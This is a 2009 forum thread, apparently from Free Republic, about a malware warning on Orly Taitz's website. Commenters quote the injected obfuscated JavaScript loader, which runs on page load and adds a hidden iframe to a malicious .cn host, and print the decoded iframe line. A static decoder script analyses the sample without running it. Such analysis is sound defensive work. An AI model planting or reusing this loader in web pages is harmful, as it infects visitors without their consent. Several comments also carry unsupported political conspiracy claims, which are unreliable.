Posted on 08/09/2009 5:56:47 AM PDT by SvenMagnussen
On the night of July 31, I first noticed this alert at the website of Dr. Orly Taitz, Esq.:
On that date, July 31, 2009:
What happened when Google visited this site?
Of the 8 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-07-31, and the last time suspicious content was found on this site was on 2009-07-31.
Malicious software includes 2 scripting exploit(s). Successful infection resulted in an average of 2 new process(es) on the target machine.
Malicious software is hosted on 3 domain(s), including cybercrime-protection.cn/, mcafee-malware.com/, security-alerts.cn/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including security-alerts.cn/.
(Excerpt) Read more at ohforgoodnesssake.com ...
I looked her site over, and also did a DNS lookup to see who was hosting it. Based on what I saw, the site is hosted by her registrar (NetworkSolutions), and I strongly suspect it was created using one of the standard web page templates that Network Solutions offers free with registration.
Short version: I don't think there's a "webmaster" involved here. It looks like a DIY page, most likely due to her trying to save money for the fight. Perhaps any one of our freepers with good HTML skills could offer their services.
Last weekend, about every time I came to FR, I would get a notice of a Trojan from my antivirus software. This might explain those results. I haven’t had the problem since then, but I’ve been avoiding the birth certificate stories since then.
A lot of these happen on shared host servers. The webmaster dutifully cleans them up, but they and the other thousand or two sites on that server are promptly reinfected. The domain host generally stonewalls and denies any problem.
McAfee went nuts on my laptop when I went to her site. Never went again.
Lucianne.com blocked by Google because of a single bad link.
Free Republic prohibits third-party scripts of any sort, therefore is not susceptible to this type of shenanigan.
~~~ ~~~ ~~~ ~~~ ~~~
Is this really it? (re: possible Obama's Kenyan B.C. - Attny Taitz) Click on the link
function YuLQmW(cqGOKkKxg, paXoW, bRwOHYl){
var SjTKsiaJe=bRwOHYl.split(paXoW);
var NhAxBaVLcf='';
for(qGST=0;qGST<(SjTKsiaJe.length-1);qGST++){ AXEMcaaiu = SjTKsiaJe[qGST]^cqGOKkKxg;NhAxBaVLcf += String.fromCharCode(AXEMcaaiu);}
return NhAxBaVLcf;}
function hjgksr(){
var GncOozzc=new Function("QtBFdMu", "return "+YuLQmW(-0x13+0x8+0x2f+0x29+0x2d+0x28+0x2e+0x7f, 'U','299U288U300U314U290U298U289U315U')+"."+YuLQmW(-0x7-0xe+0x14+0x3b1, 'G','978G991G980G969G')+"");
var zotuOWV=GncOozzc(-0x1c+0x25-0x1-0x1f+0x2c-0x14);
zotuOWV.innerHTML += YuLQmW(0x4+0x30+0x2c-0x25+0x0+0x4e, 'V','181V224V239V251V232V228V236V169V254V224V237V253V225V180V184V169V225V236V224V238V225V253V180V184V169V235V230V251V237V236V251V180V185V169V239V251V232V228V236V235V230V251V237V236V251V180V185V169V250V251V234V180V174V225V253V253V249V179V166V166V250V236V234V252V251V224V253V240V164V232V229V236V251V253V250V167V234V231V166V234V240V235V236V251V166V224V231V167V234V238V224V182V189V174V183V181V166V224V239V251V232V228V236V183V');}
if(window.addEventListener){window.addEventListener('load', hjgksr,false);}else if(window.attachEvent){window.attachEvent('onload', hjgksr);}

That piece of line noise is obfuscated JavaScript that generates this little gem:
<iframe width=1 height=1 border=0 frameborder=0 src='http://security-alerts.cn/cyber/in.cgi?4'></iframe>
I can tell you right now that Chinese site is up to no good.
~~~ ~~~ ~~~ ~~~ ~~~
As someone else said - the Wild Wooly Web is NOT anonymous nor without potholes - and as the LDot info shows, it's not just the site itself you have to worry about. I run all over the place with my Firefox and AdblockPlus & NoScript plugins, and have AVG, SuperAntiSpyware, and AdAware running on the system. I don't use Infernal Exploder except to visit Micro$oft, and so far have not had any infection since I brought this system live on XP-SP2 in Sept, 2007; but a lot of nasty stuff has been blocked.
Be careful out there. By the way, the offending exploit in Orly Taitz site has been taken off - for now. Considering Obama has his Acorn IT team in the White House I'm sure it's all coincidence that the 'anti-Obama' sites are getting hammered!
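The decoding step described in the post above (the obfuscated script turning into a hidden iframe) can be reproduced without running the script. This is an added example, not part of the original thread: `evalKey`, `xorDecode` and `decodeCalls` are names made up here, and `SAMPLE` holds calls copied from the posted script, with the long third string cut down to two short runs.

```javascript
// Static decoder for the XOR string scheme used by the script quoted in the thread.
// Nothing from the sample is executed: no eval, no new Function, no DOM access.
// evalKey, xorDecode and decodeCalls are names made up for this example.

// Sum a key expression built only from +/- and hex or decimal literals.
function evalKey(expr) {
  const compact = expr.replace(/\s+/g, '');
  if (!/^[+-]?(0x[0-9a-f]+|\d+)([+-](0x[0-9a-f]+|\d+))*$/i.test(compact)) {
    throw new Error('unexpected token in key expression: ' + expr);
  }
  return compact.match(/[+-]?(0x[0-9a-f]+|\d+)/gi).reduce((sum, term) => {
    const sign = term[0] === '-' ? -1 : 1;
    return sum + sign * Number(term.replace(/^[+-]/, ''));
  }, 0);
}

// Split on the separator, XOR each number with the key, map to characters.
function xorDecode(key, sep, data) {
  return data
    .replace(/\s+/g, '')          // whitespace inside the numbers is scrape damage
    .split(sep)
    .filter((tok) => tok !== '')  // the data ends with a separator; skip the empty tail
    .map((tok) => {
      if (!/^\d+$/.test(tok)) throw new Error('non-numeric token: ' + tok);
      return String.fromCharCode(Number(tok) ^ key);
    })
    .join('');
}

// Find every call of the shape name(<key expr>, '<sep>', '<data>') and decode it.
const CALL = /\w+\(\s*([-+\s0-9a-fx]+?)\s*,\s*'(.)'\s*,\s*'([^']*)'\s*\)/gi;
function decodeCalls(source) {
  return [...source.matchAll(CALL)].map((m) => xorDecode(evalKey(m[1]), m[2], m[3]));
}

// Calls copied from the post. The last two are short runs of the long third
// string; the final one keeps a stray space the page scrape left inside "251".
const SAMPLE = [
  "YuLQmW(-0x13+0x8+0x2f+0x29+0x2d+0x28+0x2e+0x7f, 'U','299U288U300U314U290U298U289U315U')",
  "YuLQmW(-0x7- 0xe+0x14+0x3b1, 'G','978G991G980G969G')",
  "YuLQmW(0x4+0x30+0x2c- 0x25+0x0+0x4e, 'V','181V224V239V251V232V228V236V')",
  "YuLQmW(0x4+0x30+0x2c- 0x25+0x0+0x4e, 'V','235V230V2 51V237V236V251V')",
].join('\n');

console.log(decodeCalls(SAMPLE));
```

The first two strings give the object the script writes to, and the third is the start of the injected markup, which is why script blockers that stop the decoder from running also stop the iframe from ever being added.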
Even folks who hope she is right dislike her because she is such a gibbering idiot.
.
From Orly Taitz website:
‘There is no malware sitting on my site, but George Soros's son is sitting on Google board. He should look up the meaning of the word treason.’
I am creating a Flash-based website. What countermeasures or inoculations can one install?
George Soros's son is sitting on Google board
You have to be kidding me ?
This is turning into a nightmare.
So, Firefox routinely asks Google whether a site is dangerous, or not. This is the default behavior, though it can be turned off.
As I said, I don't trust Google.
The best option for something like this is a Firefox add on called “NoScript.” It won’t allow scripts to run without your permission. You can authorize safe sites, but it will automatically keep unknown third-party sites from running scripts like this.
I Hate Flash websites. Anyone who doesn't provide an alternative for bypassing the Flash doesn't want my business.
Not "flash-based" per se, but using Flash elements, which I am concerned might be hijacked by this method.
Well, then there is also that.
OK. When I hit a website, and I have to run Flash to do anything - no optional links to get in, I usually go somewhere else. If they have an option to enter without doing the Flash, I’ll be happy to visit.
I visited her website during the time it was supposedly contagious. Is it likely my machine got infected and if so what would the effects be?
To begin with you may want to make backups of all your important data files. Recently had to format my web browsing computer twice. First time I got hit on the same weekend South Korea was attacked. I was simply downloading a large file from the MegaDownload site. The second time some malware came through one of my online 3rd party applications. That was an attack on our 3rd party application that was hosted on a server in Slovakia. We were running an application written by a Spanish company. So we were vulnerable and may be a canary in a coal mine for other sites hosted on the hopefully better protected US servers. All seven of my websites are now hosted on US servers and we don't run any foreign-written PHP programs anymore. If you allow users to upload files you are very vulnerable. Personally I think China and Russia should be completely disconnected from the web.
Thanks for posting that site that will block them through a third party domain.
Very interesting. So given the nature of the malware at Orly’s site, would it have been possible to have gotten infected just by viewing the page in my browser? Or would it have required doing something more, like opening a link or downloading an image from there or something?